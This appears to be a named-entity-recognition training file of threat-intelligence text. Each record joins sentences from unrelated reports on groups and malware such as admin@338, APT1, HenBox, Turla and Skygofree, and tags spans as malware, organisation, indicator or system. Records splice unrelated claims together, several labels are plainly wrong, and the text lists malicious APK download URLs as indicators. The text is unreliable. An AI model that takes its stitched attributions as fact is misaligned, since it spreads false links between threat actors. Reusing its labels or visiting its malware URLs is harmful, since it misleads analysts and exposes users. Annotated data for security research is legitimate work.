{"text": "update.exe module and Keylogger by \u2018 El3ct71k \u2019 code comparison Xenotix Python Keylogger including specified mutex \u2018 mutex_var_xboz \u2019 . To make this data harvesting operation flexible , SWAnalytics equips the ability to receive and process configuration files from a remote Command-and-Control . admin@338 is a China based cyber threat group .", "spans": [{"start": 0, "end": 10, "label": "Indicator"}, {"start": 64, "end": 88, "label": "System"}, {"start": 186, "end": 197, "label": "Malware"}, {"start": 220, "end": 227, "label": "Malware"}, {"start": 232, "end": 259, "label": "Malware"}, {"start": 267, "end": 273, "label": "Malware"}, {"start": 296, "end": 305, "label": "Organization"}]}
{"text": "update.exe module and Xenotix Python Keylogger code comparison \u2018 addStartup \u2019 method from msconf.exe module \u2018 addStartup \u2019 method from Xenotix Python Keylogger Distribution We found several landing pages that spread the Android implants . Whenever users reboot their device or open up Network Speed Master , SWAnalytics will fetch the latest configuration file from http[:]//mbl[.]shunwang[.]com/cfg/config[.]json\u201d . It has previously used newsworthy events as lures to deliver malware and has primarily targeted organizations involved in financial , economic , and trade policy , typically using publicly available RATs such as PoisonIvy , as well as some non-public backdoors .", "spans": [{"start": 0, "end": 10, "label": "Indicator"}, {"start": 22, "end": 46, "label": "System"}, {"start": 90, "end": 100, "label": "Indicator"}, {"start": 135, "end": 159, "label": "System"}, {"start": 220, "end": 227, "label": "System"}, {"start": 308, "end": 319, "label": "Malware"}, {"start": 616, "end": 620, "label": "Malware"}, {"start": 629, "end": 638, "label": "Malware"}, {"start": 657, "end": 677, "label": "Malware"}]}
{"text": "Malicious URL Referrer Dates http : //217.194.13.133/tre/internet/Configuratore_3.apk http : //217.194.13.133/tre/internet/ 2015-02-04 to present time http : //217.194.13.133/appPro_AC.apk \u2013 2015-07-01 http : //217.194.13.133/190/configurazione/vodafone/smartphone/VODAFONE % 20Configuratore % 20v5_4_2.apk http : //217.194.13.133/190/configurazione/vodafone/smartphone/index.html In order to understand SWAnalytics\u2019 impact , we turned to public download volume data available on Chandashi , one of the app store optimization vendors specialized in Chinese mobile application markets . APT1 : Comment Crew , Comment Group , Comment Panda .", "spans": [{"start": 29, "end": 85, "label": "Indicator"}, {"start": 86, "end": 123, "label": "Indicator"}, {"start": 151, "end": 188, "label": "Indicator"}, {"start": 202, "end": 306, "label": "Indicator"}, {"start": 307, "end": 380, "label": "Indicator"}, {"start": 404, "end": 416, "label": "Malware"}, {"start": 586, "end": 590, "label": "Organization"}, {"start": 593, "end": 605, "label": "Organization"}, {"start": 608, "end": 621, "label": "Organization"}, {"start": 624, "end": 637, "label": "Organization"}]}
{"text": "2015-01-20 to present time http : //217.194.13.133/190/configurazione/vodafone/smartphone/Vodafone % 20Configuratore.apk http : //217.194.13.133/190/configurazione/vodafone/smartphone/index.html currently active http : //vodafoneinfinity.sytes.net/tim/internet/Configuratore_TIM.apk http : //vodafoneinfinity.sytes.net/tim/internet/ 2015-03-04 http : //vodafoneinfinity.sytes.net/190/configurazione/vodafone/smartphone/VODAFONE Data points span from September 2018 to January 2019 where we observed over 17 million downloads in just five months . APT1 is a Chinese threat group that has been attributed to the 2nd Bureau of the People \u2019s Liberation Army ( PLA ) General Staff Department \u2019s ( GSD ) 3rd Department , commonly known by its Military Unit Cover Designator ( MUCD ) as Unit 61398 .", "spans": [{"start": 27, "end": 120, "label": "Indicator"}, {"start": 121, "end": 194, "label": "Indicator"}, {"start": 212, "end": 282, "label": "Indicator"}, {"start": 283, "end": 332, "label": "Indicator"}, {"start": 344, "end": 427, "label": "Indicator"}, {"start": 487, "end": 489, "label": "Organization"}, {"start": 547, "end": 551, "label": "Organization"}, {"start": 610, "end": 653, "label": "Organization"}, {"start": 656, "end": 659, "label": "Organization"}, {"start": 662, "end": 689, "label": "Organization"}, {"start": 692, "end": 695, "label": "Organization"}, {"start": 698, "end": 712, "label": "Organization"}, {"start": 737, "end": 767, "label": "Organization"}, {"start": 770, "end": 774, "label": "Organization"}, {"start": 780, "end": 790, "label": "Organization"}]}
{"text": "% 20Configuratore % 20v5_4_2.apk http : //vodafoneinfinity.sytes.net/190/configurazione/vodafone/smartphone/ 2015-01-14 http : //windupdate.serveftp.com/wind/LTE/WIND % 20Configuratore % 20v5_4_2.apk http : //windupdate.serveftp.com/wind/LTE/ 2015-03-31 http : //119.network/lte/Internet-TIM-4G-LTE.apk http : //119.network/lte/download.html In China alone , we have seen underground market sheep shavers\u201d ported SMS rogue marketing strategy to spread Alipay Red Packet referral URL links . APT12 : IXESHE , DynCalc , Numbered Panda , DNSCALC .", "spans": [{"start": 33, "end": 108, "label": "Indicator"}, {"start": 120, "end": 199, "label": "Indicator"}, {"start": 200, "end": 242, "label": "Indicator"}, {"start": 254, "end": 302, "label": "Indicator"}, {"start": 303, "end": 341, "label": "Indicator"}, {"start": 391, "end": 405, "label": "Organization"}, {"start": 491, "end": 496, "label": "Organization"}, {"start": 499, "end": 505, "label": "Organization"}, {"start": 508, "end": 515, "label": "Organization"}, {"start": 518, "end": 532, "label": "Organization"}, {"start": 535, "end": 542, "label": "Organization"}]}
{"text": "2015-02-04 2015-07-20 http : //119.network/lte/Configuratore_TIM.apk 2015-07-08 Many of these domains are outdated , but almost all ( except one \u2013 appPro_AC.apk ) samples located on the 217.194.13.133 server are still accessible . In Operation Sheep\u2019s case , Shun Wang likely harvests end user contact lists without application developer acknowledgement . APT12 is a threat group that has been attributed to China .", "spans": [{"start": 22, "end": 68, "label": "Indicator"}, {"start": 147, "end": 160, "label": "Indicator"}, {"start": 186, "end": 200, "label": "Indicator"}, {"start": 259, "end": 268, "label": "Organization"}, {"start": 356, "end": 361, "label": "Organization"}]}
{"text": "All the observed landing pages mimic the mobile operators \u2019 web pages through their domain name and web page content as well . According to Cheetah Mobile\u2019s follow-up investigation , fraudulent behaviors came from two 3rd party SDKs Batmobi , Duapps integrated inside Cheetah SDK . The group has targeted a variety of victims including but not limited to media outlets , high-tech companies , and multiple governments .", "spans": [{"start": 233, "end": 240, "label": "Malware"}, {"start": 243, "end": 249, "label": "Malware"}, {"start": 268, "end": 279, "label": "Malware"}, {"start": 355, "end": 368, "label": "Organization"}, {"start": 371, "end": 390, "label": "Organization"}, {"start": 397, "end": 417, "label": "Organization"}]}
{"text": "Further research of the attacker \u2019 s infrastructure revealed more related mimicking domains . It is likely a new campaign or actor started using Panda Banker since in addition to the previously unseen Japanese targeting , Arbor has not seen any indicator of compromise (IOC) overlaps with previous Panda Banker campaigns . The admin@338 has largely targeted organizations involved in financial , economic and trade policy , typically using publicly available RATs such as Poison Ivy , as well some non-public backdoors .", "spans": [{"start": 125, "end": 130, "label": "Organization"}, {"start": 145, "end": 157, "label": "System"}, {"start": 222, "end": 227, "label": "Organization"}, {"start": 298, "end": 310, "label": "Malware"}, {"start": 327, "end": 336, "label": "Organization"}, {"start": 384, "end": 393, "label": "Organization"}, {"start": 396, "end": 404, "label": "Organization"}, {"start": 409, "end": 421, "label": "Organization"}, {"start": 459, "end": 463, "label": "Malware"}, {"start": 472, "end": 482, "label": "Malware"}, {"start": 498, "end": 518, "label": "Malware"}]}
{"text": "Unfortunately , for now we can \u2019 t say in what environment these landing pages were used in the wild , but according to all the information at our dsiposal , we can assume that they are perfect for exploitation using malicious redirects or man-in-the-middle attacks . Webinjects targeting Japan , a country we haven\u2019t seen targeted by Panda Banker before . The admin@338 started targeting Hong Kong media companies , probably in response to political and economic challenges in Hong Kong and China .", "spans": [{"start": 335, "end": 347, "label": "Malware"}, {"start": 361, "end": 370, "label": "Organization"}, {"start": 399, "end": 414, "label": "Organization"}, {"start": 441, "end": 450, "label": "Organization"}, {"start": 455, "end": 463, "label": "Organization"}]}
{"text": "For example , this could be when the victim \u2019 s device connects to a Wi-Fi access point that is infected or controlled by the attackers . Japan is no stranger to banking malware . Multiple China-based cyber threat groups have targeted international media organizations in the past .", "spans": [{"start": 162, "end": 169, "label": "Malware"}, {"start": 170, "end": 177, "label": "Malware"}, {"start": 235, "end": 268, "label": "Organization"}]}
{"text": "Artifacts During the research , we found plenty of traces of the developers and those doing the maintaining . Based on recent reports , the country has been plagued by attacks using the Ursnif and Urlzone banking malware . The admin@338 has targeted international media organizations in the past .", "spans": [{"start": 186, "end": 192, "label": "Malware"}, {"start": 197, "end": 204, "label": "Malware"}, {"start": 227, "end": 236, "label": "Organization"}, {"start": 250, "end": 283, "label": "Organization"}]}
{"text": "As already stated in the \u2018 malware features \u2019 part , there are multiple giveaways in the code . This post was our first analysis of the first Panda Banker campaign that we\u2019ve seen to target financial institutions in Japan . In August 2015 , the admin@338 sent spear phishing emails to a number of Hong Kong-based media organizations , including newspapers , radio , and television .", "spans": [{"start": 142, "end": 154, "label": "Malware"}, {"start": 190, "end": 212, "label": "Organization"}, {"start": 245, "end": 254, "label": "Organization"}, {"start": 275, "end": 281, "label": "System"}, {"start": 313, "end": 332, "label": "Organization"}]}
{"text": "Here are just some of them : ngglobal \u2013 FirebaseCloudMessaging topic name Issuer : CN = negg \u2013 from several certificates negg.ddns [ . Operation Pawn Storm is an active economic and political cyber-espionage operation that targets a wide range of entities , like the military , governments , defense industries , and the media . In August 2015 , the threat actors sent spear phishing emails to a number of Hong Kong-based media organizations , including newspapers , radio , and television .", "spans": [{"start": 121, "end": 134, "label": "Indicator"}, {"start": 135, "end": 155, "label": "Organization"}, {"start": 169, "end": 177, "label": "Organization"}, {"start": 182, "end": 191, "label": "Organization"}, {"start": 267, "end": 275, "label": "Organization"}, {"start": 278, "end": 289, "label": "Organization"}, {"start": 292, "end": 310, "label": "Organization"}, {"start": 321, "end": 326, "label": "Organization"}, {"start": 357, "end": 363, "label": "Organization"}, {"start": 384, "end": 390, "label": "System"}, {"start": 422, "end": 441, "label": "Organization"}]}
{"text": "] net , negg1.ddns [ . We believe the iOS malware gets installed on already compromised systems , and it is very similar to next stage SEDNIT malware we have found for Microsoft Windows\u2019 systems . In August 2015 , the admin@338 sent spear phishing emails to a number of Hong Kong-based media organizations .", "spans": [{"start": 8, "end": 22, "label": "Indicator"}, {"start": 23, "end": 25, "label": "Organization"}, {"start": 135, "end": 141, "label": "Malware"}, {"start": 218, "end": 227, "label": "Organization"}, {"start": 248, "end": 254, "label": "System"}, {"start": 286, "end": 305, "label": "Organization"}]}
{"text": "] net , negg2.ddns [ . We found two malicious iOS applications in Operation Pawn Storm . The admin@338 previous activities against financial and policy organizations have largely focused on spear phishing emails written in English , destined for Western audiences .", "spans": [{"start": 8, "end": 22, "label": "Indicator"}, {"start": 23, "end": 25, "label": "Organization"}, {"start": 93, "end": 102, "label": "Organization"}, {"start": 131, "end": 140, "label": "Organization"}, {"start": 145, "end": 165, "label": "Organization"}, {"start": 205, "end": 211, "label": "System"}, {"start": 254, "end": 263, "label": "Organization"}]}
{"text": "] net \u2013 C & C servers NG SuperShell \u2013 string from the reverse shell payload ngg \u2013 prefix in commands names of the implant for Windows Signature with specific issuer Whois records and IP relationships provide many interesting insights as well . One is called XAgent detected as IOS_XAGENT.A and the other one uses the name of a legitimate iOS game , MadCap detected as IOS_ XAGENT.B . Once the LOWBALL malware calls back to the Dropbox account , the admin@338 will create a file called upload.bat which contains commands to be executed on the compromised computer .", "spans": [{"start": 126, "end": 133, "label": "System"}, {"start": 258, "end": 264, "label": "Malware"}, {"start": 277, "end": 289, "label": "Malware"}, {"start": 349, "end": 355, "label": "Malware"}, {"start": 373, "end": 381, "label": "Malware"}, {"start": 393, "end": 400, "label": "Malware"}, {"start": 401, "end": 408, "label": "Malware"}, {"start": 427, "end": 434, "label": "System"}, {"start": 449, "end": 458, "label": "Organization"}, {"start": 485, "end": 495, "label": "Indicator"}]}
{"text": "There are a lot of other \u2018 Negg \u2019 mentions in Whois records and references to it . The obvious goal of the SEDNIT-related spyware is to steal personal data , record audio , make screenshots , and send them to a remote command-and-control (C&C) server . We observed the admin@338 upload a second stage malware , known as BUBBLEWRAP ( also known as Backdoor.APT.FakeWinHTTPHelper ) to their Dropbox account along with the following command .", "spans": [{"start": 107, "end": 121, "label": "Organization"}, {"start": 142, "end": 155, "label": "Organization"}, {"start": 269, "end": 278, "label": "Organization"}, {"start": 320, "end": 330, "label": "Malware"}, {"start": 347, "end": 377, "label": "Malware"}, {"start": 389, "end": 396, "label": "System"}]}
{"text": "For example : Conclusions The Skygofree Android implant is one of the most powerful spyware tools that we have ever seen for this platform . Madcap\u201d is similar to the XAgent malware , but the former is focused on recording audio . We have previously observed the admin@338 group use BUBBLEWRAP .", "spans": [{"start": 30, "end": 39, "label": "Malware"}, {"start": 40, "end": 47, "label": "System"}, {"start": 141, "end": 148, "label": "Malware"}, {"start": 167, "end": 173, "label": "Malware"}, {"start": 263, "end": 278, "label": "Organization"}, {"start": 283, "end": 293, "label": "Malware"}]}
{"text": "As a result of the long-term development process , there are multiple , exceptional capabilities : usage of multiple exploits for gaining root privileges , a complex payload structure , never-before-seen surveillance features such as recording surrounding audio in specified locations . To learn more about this campaign , you may refer to our report , Operation Pawn Storm Using Decoys to Evade Detection . The LOWBALL first stage malware allows the group to collect information from victims and then deliver the BUBBLEWRAP second stage malware to their victims after verifying that they are indeed interesting targets .", "spans": [{"start": 390, "end": 405, "label": "Organization"}, {"start": 412, "end": 419, "label": "Malware"}, {"start": 514, "end": 524, "label": "Malware"}]}
{"text": "Given the many artifacts we discovered in the malware code , as well as infrastructure analysis , we are pretty confident that the developer of the Skygofree implants is an Italian IT company that works on surveillance solutions , just like HackingTeam . Additionally , we discovered a new DNS hijacking technique that we assess with moderate confidence is connected to the actors behind Sea Turtle . The admin@338 linked to China and alleged to be responsible for targeted attacks against foreign governments and ministries , has now pointed its focus inward at China autonomous territory Hong Kong .", "spans": [{"start": 148, "end": 157, "label": "Malware"}, {"start": 241, "end": 252, "label": "Organization"}, {"start": 374, "end": 380, "label": "Organization"}, {"start": 405, "end": 414, "label": "Organization"}, {"start": 498, "end": 509, "label": "Organization"}]}
{"text": "HenBox : The Chickens Come Home to Roost March 13 , 2018 at 5:00 AM Unit 42 recently discovered a new Android malware family we named \u201c HenBox \u201d masquerading as a variety of legitimate Android apps . Talos now has moderate confidence that the threat actors behind Sea Turtle have been using another DNS hijacking technique . An APT gang linked to China and alleged to be responsible for targeted attacks against foreign governments and ministries , has now pointed its focus inward at China autonomous territory Hong Kong .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 102, "end": 109, "label": "System"}, {"start": 136, "end": 142, "label": "Malware"}, {"start": 185, "end": 192, "label": "System"}, {"start": 200, "end": 205, "label": "Organization"}, {"start": 332, "end": 336, "label": "Organization"}, {"start": 420, "end": 431, "label": "Organization"}]}
{"text": "We chose the name \u201c HenBox \u201d based on metadata found in most of the malicious apps such as package names and signer detail . This technique was also observed against a government organizations in the Middle East and North African region . The group targeting Hong Kong media outlets is called admin@338 and is known to researchers for using publicly available remote access Trojans such as Poison Ivy to attack government and financial firms specializing in global economic policy .", "spans": [{"start": 20, "end": 26, "label": "Malware"}, {"start": 269, "end": 274, "label": "Organization"}, {"start": 293, "end": 302, "label": "Organization"}, {"start": 360, "end": 381, "label": "Malware"}, {"start": 390, "end": 400, "label": "Malware"}, {"start": 411, "end": 421, "label": "Organization"}, {"start": 426, "end": 441, "label": "Organization"}, {"start": 458, "end": 473, "label": "Organization"}]}
{"text": "HenBox masquerades as apps such as VPN and Android system apps and often installs legitimate versions of these apps along with HenBox to trick users into thinking they downloaded the legitimate app . Cisco telemetry confirmed that the actors behind Sea Turtle maintained access to the ICS-Forth network from an operational command and control (C2) node . The agroup targeting Hong Kong media outlets is called admin@338 and is known to researchers for using publicly available remote access Trojans such as Poison Ivy to attack government and financial firms specializing in global economic policy .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 43, "end": 50, "label": "System"}, {"start": 127, "end": 133, "label": "Malware"}, {"start": 200, "end": 205, "label": "Organization"}, {"start": 335, "end": 347, "label": "System"}, {"start": 359, "end": 365, "label": "Organization"}, {"start": 386, "end": 391, "label": "Organization"}, {"start": 410, "end": 419, "label": "Organization"}, {"start": 477, "end": 498, "label": "Malware"}, {"start": 507, "end": 517, "label": "Malware"}, {"start": 528, "end": 538, "label": "Organization"}, {"start": 543, "end": 558, "label": "Organization"}, {"start": 575, "end": 590, "label": "Organization"}]}
{"text": "While some of the legitimate apps HenBox use as decoys can be found on Google Play , HenBox apps themselves have only been found on third-party ( non-Google Play ) app stores . Our telemetry indicates that the actors maintained access in the ICS-Forth network through at least April 24 , five days after the statement was publicly released . The admin@338 , active since 2008 , has been seen targeting organizations in the financial services , telecoms , government , and defense sectors .", "spans": [{"start": 34, "end": 40, "label": "Malware"}, {"start": 71, "end": 82, "label": "System"}, {"start": 85, "end": 91, "label": "Malware"}, {"start": 157, "end": 161, "label": "System"}, {"start": 210, "end": 216, "label": "Organization"}, {"start": 346, "end": 355, "label": "Organization"}, {"start": 423, "end": 441, "label": "Organization"}, {"start": 444, "end": 452, "label": "Organization"}, {"start": 455, "end": 465, "label": "Organization"}, {"start": 472, "end": 487, "label": "Organization"}]}
{"text": "HenBox appears to primarily target the Uyghurs \u2013 a minority Turkic ethnic group that is primarily Muslim and lives mainly in the Xinjiang Uyghur Autonomous Region in North West China . This full-blown spying framework consists of two packages named \u2018Tokyo\u2019 and \u2018Yokohama\u2019 . The APT actor , active since 2008 , has been seen targeting organizations in the financial services , telecoms , government , and defense sectors .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 249, "end": 256, "label": "Malware"}, {"start": 261, "end": 271, "label": "Malware"}, {"start": 278, "end": 287, "label": "Organization"}, {"start": 355, "end": 373, "label": "Organization"}, {"start": 376, "end": 384, "label": "Organization"}, {"start": 387, "end": 397, "label": "Organization"}, {"start": 404, "end": 419, "label": "Organization"}]}
{"text": "It also targets devices made by Chinese manufacturer Xiaomi and those running MIUI , an operating system based on Google Android made by Xiaomi . Just to highlight its capabilities , TajMahal is able to steal data from a CD burnt by a victim as well as from the printer queue . In August 2013 , FireEye reported that admin@338 had been using the Poison Ivy RAT in its operations .", "spans": [{"start": 53, "end": 59, "label": "Organization"}, {"start": 78, "end": 82, "label": "System"}, {"start": 114, "end": 128, "label": "System"}, {"start": 137, "end": 143, "label": "Organization"}, {"start": 183, "end": 191, "label": "Malware"}, {"start": 203, "end": 213, "label": "Malware"}, {"start": 295, "end": 302, "label": "Organization"}, {"start": 317, "end": 326, "label": "Organization"}, {"start": 346, "end": 360, "label": "Malware"}]}
{"text": "Smartphones are the dominant form of internet access in the region and Xinjiang was recently above the national average of internet users in China . The first confirmed date when TajMahal samples were seen on a victim\u2019s machine is August 2014 . In March 2014 , the admin@338 leveraged the disappearance of Malaysia Airlines Flight MH370 to target a government in the Asia-Pacific region and a US-based think tank .", "spans": [{"start": 179, "end": 187, "label": "Malware"}, {"start": 265, "end": 274, "label": "Organization"}, {"start": 349, "end": 359, "label": "Organization"}, {"start": 402, "end": 412, "label": "Organization"}]}
{"text": "The result is a large online population who have been the subject of numerous cyber-attacks in the past . More details about TajMahal are available to customers of the Kaspersky Intelligence Reporting service (contact intelreports@kaspersky.com) . In March 2014 , the group leveraged the disappearance of Malaysia Airlines Flight MH370 to target a government in the Asia-Pacific region and a US-based think tank .", "spans": [{"start": 125, "end": 133, "label": "Malware"}, {"start": 168, "end": 177, "label": "Organization"}, {"start": 348, "end": 358, "label": "Organization"}, {"start": 401, "end": 411, "label": "Organization"}]}
{"text": "Once installed , HenBox steals information from the devices from a myriad of sources , including many mainstream chat , communication , and social media apps . The dropper first appeared in mid-July , suggesting that this APT activity is potentially ongoing , with Turla actively targeting G20 participants and/or those with interest in the G20 , including member nations , journalists , and policymakers . According to FireEye , the admin@338 sent out emails containing malicious documents designed to exploit Microsoft Office vulnerabilities in an effort to deliver a piece of malware dubbed LOWBALL .", "spans": [{"start": 17, "end": 23, "label": "Malware"}, {"start": 265, "end": 270, "label": "Organization"}, {"start": 290, "end": 293, "label": "Organization"}, {"start": 420, "end": 427, "label": "Organization"}, {"start": 434, "end": 443, "label": "Organization"}, {"start": 453, "end": 459, "label": "System"}, {"start": 503, "end": 510, "label": "Vulnerability"}, {"start": 511, "end": 527, "label": "Organization"}, {"start": 528, "end": 543, "label": "Vulnerability"}, {"start": 594, "end": 601, "label": "Malware"}]}
{"text": "The stolen information includes personal and device information . Turla is a well-documented , long operating APT group that is widely believed to be a Russian state-sponsored organization . According to FireEye , the attackers sent out emails containing malicious documents designed to exploit Microsoft Office vulnerabilities in an effort to deliver a piece of malware dubbed LOWBALL .", "spans": [{"start": 66, "end": 71, "label": "Organization"}, {"start": 204, "end": 211, "label": "Organization"}, {"start": 218, "end": 227, "label": "Organization"}, {"start": 237, "end": 243, "label": "System"}, {"start": 287, "end": 294, "label": "Vulnerability"}, {"start": 295, "end": 311, "label": "Organization"}, {"start": 312, "end": 327, "label": "Vulnerability"}, {"start": 378, "end": 385, "label": "Malware"}]}
{"text": "Of note , in addition to tracking the compromised device \u2019 s location , HenBox also harvests all outgoing phone numbers with an \u201c 86 \u201d prefix , which is the country code for the People \u2019 s Republic of China ( PRC ) . Turla is perhaps most notoriously suspected as responsible for the breach of the United States Central Command in 2008 . The admin@338 's Dropbox accounts have also been found to contain a different backdoor dubbed BUBBLEWRAP .", "spans": [{"start": 72, "end": 78, "label": "Malware"}, {"start": 217, "end": 222, "label": "Organization"}, {"start": 342, "end": 351, "label": "Organization"}, {"start": 355, "end": 362, "label": "System"}, {"start": 432, "end": 442, "label": "Malware"}]}
{"text": "It can also access the phone \u2019 s cameras and microphone . More recently Turla was accused of breaching RUAG , a Swiss technology company , in a public report published by GovCERT.ch . Researchers have pointed out that it is not uncommon for China-based threat groups to target Hong Kong media organizations , particularly ones whose reporting focuses on the pro-democracy movement .", "spans": [{"start": 72, "end": 77, "label": "Organization"}, {"start": 103, "end": 107, "label": "Organization"}, {"start": 171, "end": 181, "label": "Organization"}, {"start": 253, "end": 266, "label": "Organization"}, {"start": 287, "end": 306, "label": "Organization"}]}
{"text": "HenBox has ties to infrastructure used in targeted attacks with a focus on politics in South East Asia . The delivery of KopiLuwak in this instance is currently unknown as the MSIL dropper has only been observed by Proofpoint researchers on a public malware repository . Researchers have pointed out that it is not uncommon for admin@338 to target Hong Kong media organizations , particularly ones whose reporting focuses on the pro-democracy movement .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 176, "end": 188, "label": "Malware"}, {"start": 215, "end": 225, "label": "Organization"}, {"start": 328, "end": 337, "label": "Organization"}, {"start": 358, "end": 377, "label": "Organization"}]}
{"text": "These attackers have used additional malware families in previous activity dating to at least 2015 that include PlugX , Zupdax , 9002 , and Poison Ivy . Assuming this variant of KopiLuwak has been observed in the wild , there are a number of ways it may have been delivered including some of Turla\u2019s previous attack methods such as spear phishing or via a watering hole . This week the experts at FireEye discovered that a group of Chinese-based hackers called admin@338 had sent multiple MH370-themed spear phishing emails , the attackers targeted government officials in Asia-Pacific , it is likely for cyber espionage purpose .", "spans": [{"start": 112, "end": 117, "label": "Malware"}, {"start": 120, "end": 126, "label": "Malware"}, {"start": 129, "end": 133, "label": "Malware"}, {"start": 140, "end": 150, "label": "Malware"}, {"start": 292, "end": 299, "label": "Organization"}, {"start": 397, "end": 404, "label": "Organization"}, {"start": 461, "end": 470, "label": "Organization"}, {"start": 517, "end": 523, "label": "System"}, {"start": 530, "end": 539, "label": "Organization"}, {"start": 549, "end": 569, "label": "Organization"}, {"start": 605, "end": 620, "label": "Organization"}]}
{"text": "This also aligns with HenBox \u2019 s timeline , as in total we have identified almost 200 HenBox samples , with the oldest dating to 2015 . This could include diplomats , experts in the areas of interest related to the Digital Economy Task Force , or possibly even journalists . The attackers used the popular Poison Ivy RAT and WinHTTPHelper malware to compromise the computers of government officials .", "spans": [{"start": 22, "end": 28, "label": "Malware"}, {"start": 86, "end": 92, "label": "Malware"}, {"start": 155, "end": 164, "label": "Organization"}, {"start": 261, "end": 272, "label": "Organization"}, {"start": 279, "end": 288, "label": "Organization"}, {"start": 306, "end": 320, "label": "Malware"}, {"start": 325, "end": 338, "label": "Malware"}, {"start": 339, "end": 346, "label": "Malware"}, {"start": 378, "end": 398, "label": "Organization"}]}
{"text": "Most of the samples we found date from the last half of 2017 , fewer samples date from 2016 , and a handful date back to 2015 . Turla's goal could include diplomats , experts in the areas of interest related to the Digital Economy Task Force , or possibly even journalists . The admin@338 used the popular Poison Ivy RAT and WinHTTPHelper malware to compromise the computers of government officials .", "spans": [{"start": 128, "end": 135, "label": "Organization"}, {"start": 215, "end": 230, "label": "Organization"}, {"start": 279, "end": 288, "label": "Organization"}, {"start": 306, "end": 320, "label": "Malware"}, {"start": 325, "end": 338, "label": "Malware"}, {"start": 339, "end": 346, "label": "Malware"}, {"start": 378, "end": 398, "label": "Organization"}]}
{"text": "In 2018 , we have already observed a small but consistent number of samples . The earliest step in any possible attack(s) involving this variant of KopiLuwak of which Proofpoint researchers are currently aware begin with the MSIL dropper . FireEye analysts documented the admin@338 group 's activities in a previous paper titled Poison Ivy : Assessing Damage and Extracting Intelligence paper .", "spans": [{"start": 148, "end": 157, "label": "Malware"}, {"start": 225, "end": 237, "label": "Malware"}, {"start": 240, "end": 247, "label": "Organization"}, {"start": 272, "end": 287, "label": "Organization"}, {"start": 329, "end": 339, "label": "Malware"}]}
{"text": "We believe this indicates a fairly sustained campaign that has gained momentum over recent months . The basic chain of events upon execution of the MSIL dropper include dropping and executing both a PDF decoy and a Javascript (JS) dropper . The spear-phishing campaign against Asian entities isn't isolated , the admin@338 also started another attack against the US-based think tank on 14th March .", "spans": [{"start": 148, "end": 160, "label": "Malware"}, {"start": 215, "end": 238, "label": "Malware"}, {"start": 313, "end": 322, "label": "Organization"}, {"start": 372, "end": 382, "label": "Organization"}]}
{"text": "HenBox Enters the Uyghur App Store In May 2016 , a HenBox app was downloaded from uyghurapps [ . As explained in further detail below , the JS dropper ultimately installs a JS decryptor onto an infected machine that will then finally decrypt and execute the actual KopiLuwak backdoor in memory only . Our analysis has led us to conclude that APT1 is likely government-sponsored and one of the most persistent of China 's cyber threat actors .", "spans": [{"start": 0, "end": 6, "label": "Malware"}, {"start": 18, "end": 34, "label": "System"}, {"start": 51, "end": 57, "label": "Malware"}, {"start": 82, "end": 96, "label": "Indicator"}, {"start": 140, "end": 150, "label": "Malware"}, {"start": 173, "end": 185, "label": "Malware"}, {"start": 265, "end": 274, "label": "Malware"}, {"start": 342, "end": 346, "label": "Organization"}, {"start": 421, "end": 440, "label": "Organization"}]}
{"text": "] net . As Proofpoint has not yet observed this attack in the wild it is likely that there is an additional component that leads to the execution of the MSIL payload . FireEye said it has tracked admin@338 's activity since 2013 and the group has largely targeted organizations involved in financial , economic , and trade policy .", "spans": [{"start": 11, "end": 21, "label": "Organization"}, {"start": 153, "end": 165, "label": "Malware"}, {"start": 168, "end": 175, "label": "Organization"}, {"start": 196, "end": 205, "label": "Organization"}, {"start": 290, "end": 299, "label": "Organization"}, {"start": 302, "end": 310, "label": "Organization"}, {"start": 317, "end": 329, "label": "Organization"}]}
{"text": "Specifically , the app was an Android Package ( APK ) file that will be discussed in more detail shortly . The newer variant of KopiLuwak is now capable of exfiltrating files to the C&C as well as downloading files and saving them to the infected machine . The simplest conclusion based on these facts is that APT1 is operating in China , and most likely in Shanghai .", "spans": [{"start": 30, "end": 45, "label": "System"}, {"start": 128, "end": 137, "label": "Malware"}, {"start": 156, "end": 174, "label": "Malware"}, {"start": 197, "end": 214, "label": "Malware"}, {"start": 310, "end": 314, "label": "Organization"}]}
{"text": "The domain name , language of the site and app content hosted suggest this site is a third-party app store for whom the intended users are the Uyghurs . Despite the added capabilities , we still agree with Kaspersky that this backdoor is likely used as an initial reconnaissance tool and would probably be used as a staging point to deploy one of Turla\u2019s more fully featured implants . These data sets show that APT1 is either operating in China during normal Chinese business hours or that APT1 is intentionally going to painstaking lengths to look like they are .", "spans": [{"start": 206, "end": 215, "label": "Organization"}, {"start": 347, "end": 354, "label": "Organization"}, {"start": 412, "end": 416, "label": "Organization"}, {"start": 491, "end": 495, "label": "Organization"}]}
{"text": "Such app stores are so-called because they are not officially supported by Android , nor are they provided by Google , unlike the Play Store . Turla is a complex cyberattack platform focused predominantly on diplomatic and government-related targets , particularly in the Middle East , Central and Far East Asia , Europe , North and South America and former Soviet bloc nations . APT1 has used and steadily modified BISCUIT since as early as 2007 and continues to use it presently .", "spans": [{"start": 75, "end": 82, "label": "System"}, {"start": 110, "end": 116, "label": "Organization"}, {"start": 130, "end": 140, "label": "System"}, {"start": 143, "end": 148, "label": "Organization"}, {"start": 380, "end": 384, "label": "Organization"}, {"start": 416, "end": 423, "label": "Malware"}]}
{"text": "Third-party app stores are ubiquitous in China for a number of reasons including : evermore powerful Chinese Original Equipment Manufacturers ( OEM ) , a lack of an official Chinese Google Play app store , and a growing smartphone market . We didn\u2019t choose to name it after a vegetable; the .NET malware developers named it Topinambour themselves . While APT1 intruders occasionally use publicly available backdoors such as Poison Ivy and Gh0st RAT .", "spans": [{"start": 101, "end": 149, "label": "Organization"}, {"start": 182, "end": 193, "label": "System"}, {"start": 291, "end": 303, "label": "Malware"}, {"start": 324, "end": 335, "label": "Malware"}, {"start": 355, "end": 359, "label": "Organization"}, {"start": 387, "end": 415, "label": "Malware"}, {"start": 424, "end": 434, "label": "Malware"}, {"start": 439, "end": 448, "label": "Malware"}]}
